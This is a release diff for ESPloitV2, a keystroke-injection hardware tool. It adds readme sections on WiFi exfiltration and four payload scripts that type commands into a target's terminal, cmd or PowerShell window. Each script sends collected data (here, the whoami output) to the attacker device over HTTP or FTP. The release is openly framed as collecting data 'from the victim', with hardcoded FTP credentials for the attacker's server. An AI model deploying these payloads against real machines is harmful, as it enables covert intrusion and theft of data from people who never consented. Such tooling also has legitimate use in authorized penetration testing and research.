Release 2.4.0

Introduce WiFi Based Exfiltration Methods!!!

README.md

@@ -27,6 +27,8 @@ Select Tools - Board - Boards Manager. Search for "esp8266".
 Install "esp8266 by ESP8266 community version 2.3.0". Click "Close".  
 Select Sketch - Include Library - Manage Libraries. Search for "Json".  
 Install "ArduinoJson by Benoit Blanchon version 5.11.0" and click "Close"  
+Download https://github.com/apullin/esp8266FTPServer/archive/feature/bbx10_speedup.zip  
+Click Sketch - Include Library - Add .ZIP Library and select bbx10_speedup.zip from your Downloads folder.  
 The Arduino IDE is now configured and ready for the code.  
 
 Use git to clone this repo: https://github.com/exploitagency/ESPloitV2.git  
@@ -222,6 +224,12 @@ Live Payload Mode
 
 Here you may type out or copy/paste a payload to run without uploading.  
 
+-----  
+List Exfiltrated Data  
+-----  
+
+Displays any data that has been collected from the victim using ESPloit's exfiltration methods.  
+
 -----  
 Input Mode  
 -----  
@@ -251,7 +259,24 @@ Select "Browse" choose the new firmware to be uploaded to the ESP-12S chip and t
 You will need to manually reset the device upon the browser alerting you that the upgrade was successful.  
 
 If you are using this mode to swap the firmware loaded on the ESP-12S chip, and if the new firmware does not support this mode then you must reflash the ESP-12S manually by uploading the programmer sketch to the 32u4 chip and then flash the ESP-12S this way.
-
+
+-----  
+Exfiltrating Data  
+-----  
+
+To exfiltrate data be sure ESPloit and Target machine are on the same network.  
+Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.  
+
+Windows: netsh wlan set hostednetwork mode=allow ssid="SSID-HERE" key="WIFI-PASSWORD-HERE"  
+Linux: nmcli dev wifi connect SSID-HERE password WIFI-PASSWORD-HERE  
+
+For HTTP exfiltration method point the target machine to the url listed below:  
+http://ESPloit-IP-Here/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE  
+
+For FTP exfiltration method use the credentials configured in the "Configure ESPloit" page.  
+
+See the example payloads for more in depth examples.  
+
 -----  
 Changing the VID/PID  
 -----  

payloads/LinFTPExfiltrate.txt

@@ -0,0 +1,9 @@
+Rem: Exfiltrate UserName from Linux Box
+Rem: ESPloit and Target must be connected to the same network for this to work
+Rem: Set the IP/User/Pass of ESPloit below by modifying "export xip='192.168.1.169'", "ftpuser='ftp-admin'", and "ftppass='hacktheplanet'"
+Press:134+195
+PrintLine:gnome-terminal
+PrintLine:export xfile='LinuxUser.txt'; export ftpuser='ftp-admin'; export ftppass='hacktheplanet'; data="$(whoami)"; echo ${data}>${xfile}; export xip='192.168.1.169'
+Rem: Wait for FTP server to be ready
+CustomDelay:5000
+PrintLine:curl -T ${xfile} ftp://${ftpuser}:${ftppass}@${xip}/${xfile}

payloads/LinHTTPExfiltrate.txt

@@ -0,0 +1,6 @@
+Rem: Exfiltrate UserName from Linux Box
+Rem: ESPloit and Target must be connected to the same network for this to work
+Rem: Set the IP of ESPloit below by modifying "export xip='192.168.1.169'"
+Press:134+195
+PrintLine:gnome-terminal
+PrintLine:data="$(whoami)"; export xip='192.168.1.169'; export xfile='LinuxUser.txt'; curl "http://${xip}/exfiltrate?file=${xfile}&data=${data}"; exit

payloads/WinHTTPExfiltrate.txt

@@ -0,0 +1,8 @@
+Rem: Exfiltrate UserName from Windows Box
+Rem: ESPloit and Target must be connected to the same network for this to work
+Rem: Set the IP of ESPloit below by changing "SET ip=192.168.1.169"
+Press:131+114
+PrintLine:cmd
+PrintLine:whoami>tmp& SET /P data=<tmp& del tmp& SET file=WinUser.txt& SET ip=192.168.1.169
+PrintLine:SET url=^"http:///%ip%/exfiltrate^?file^=%file%^&data^=%data%^"
+PrintLine:explorer %url%&exit

payloads/WinPSFTPExfil.txt

@@ -0,0 +1,27 @@
+Rem:Based on example from https://stackoverflow.com/a/2485696/537243
+Rem:Due to formatting the exfiltrated data may not show up properly when viewing it in "List Exfiltrated Data"
+Rem:To get around this issue simply click on "Download File" when on the "List Exfiltrated Data" page
+DefaultDelay:2000
+Press:131+114
+PrintLine:powershell
+CustomDelay:3000
+PrintLine:whoami | Out-File data
+PrintLine:notepad ftp.ps1
+CustomDelay:1000
+Press:176
+CustomDelay:1000
+Rem:Modify the line below with your settings
+PrintLine:
+PrintLine:$ftpURI = "ftp://ftp-admin:[email protected]/data"
+PrintLine:$webclient = New-Object -TypeName System.Net.WebClient;
+PrintLine:$ftpURI = New-Object -TypeName System.Uri -ArgumentList $ftpURI;
+PrintLine:$webclient.UploadFile($ftpURI, [System.ENVIRONMENT]::CurrentDirectory + "\data");
+PrintLine:Write-output  "Uploaded file ... ";
+Press:130+197
+CustomDelay:1000
+PrintLine:s
+Press:176
+CustomDelay:1000
+PrintLine:
+CustomDelay:5000
+PrintLine:.\ftp.ps1

source/ESP_Code/HelpText.h

@@ -30,6 +30,8 @@ Select Tools - Board - Boards Manager. Search for "esp8266".<br>
 Install "esp8266 by ESP8266 community version 2.3.0". Click "Close".<br>
 Select Sketch - Include Library - Manage Libraries. Search for "Json".<br>
 Install "ArduinoJson by Benoit Blanchon version 5.11.0" and click "Close"<br>
+Download https://github.com/apullin/esp8266FTPServer/archive/feature/bbx10_speedup.zip<br>
+Click Sketch - Include Library - Add .ZIP Library and select bbx10_speedup.zip from your Downloads folder.<br>
 The Arduino IDE is now configured and ready for the code.<br>
 <br>
 Use git to clone this repo: https://github.com/exploitagency/ESPloitV2.git<br>
@@ -226,6 +228,12 @@ Live Payload Mode<br>
 Here you may type out or copy/paste a payload to run without uploading.<br>
 <br>
 -----<br>
+List Exfiltrated Data<br>
+-----<br>
+<br>
+Displays any data that has been collected from the victim using ESPloit's exfiltration methods.<br>
+<br>
+-----<br>
 Input Mode<br>
 -----<br>
 <br>
@@ -256,6 +264,23 @@ You will need to manually reset the device upon the browser alerting you that th
 If you are using this mode to swap the firmware loaded on the ESP-12S chip, and if the new firmware does not support this mode then you must reflash the ESP-12S manually by uploading the programmer sketch to the 32u4 chip and then flash the ESP-12S this way.
 <br><br>
 -----<br>
+Exfiltrating Data<br>
+-----<br>
+<br>
+To exfiltrate data be sure ESPloit and Target machine are on the same network.<br>
+Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.<br>
+<br>
+Windows: netsh wlan set hostednetwork mode=allow ssid="SSID-HERE" key="WIFI-PASSWORD-HERE"<br>
+Linux: nmcli dev wifi connect SSID-HERE password WIFI-PASSWORD-HERE<br>
+<br>
+For HTTP exfiltration method point the target machine to the url listed below:<br>
+http://ESPloit-IP-Here/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE<br>
+<br>
+For FTP exfiltration method use the credentials configured in the "Configure ESPloit" page.<br>
+<br>
+See the example payloads for more in depth examples.<br>
+<br>
+-----<br>
 Changing the VID/PID<br>
 -----<br>
 <br>

source/ESP_Code/License.h

@@ -223,6 +223,13 @@ Core libraries used:
  Check for the latest version then fetch and update firmware from the Internet feature based on example code from https://github.com/squix78/esp8266-ci-ota/blob/master/src/main.cpp
 */
 
+/*
+ ESP8266FtpServer.h - by nailbuster, later modified by bbx10 and apullin
+                   GNU LESSER GENERAL PUBLIC LICENSE
+                       Version 2.1, February 1999
+ https://github.com/apullin/esp8266FTPServer/blob/feature/bbx10_speedup/LICENSE
+*/
+
 This is not a comprehensive list, these "Core Libraries" may depend on additional
 libraries, more information can be obtained by viewing the source code of the main libraries.
 </pre>

source/ESP_Code/version.h

@@ -1,2 +1,2 @@
-String version = "2.3.7";
+String version = "2.4.0";
 String latestardversion = "2.1";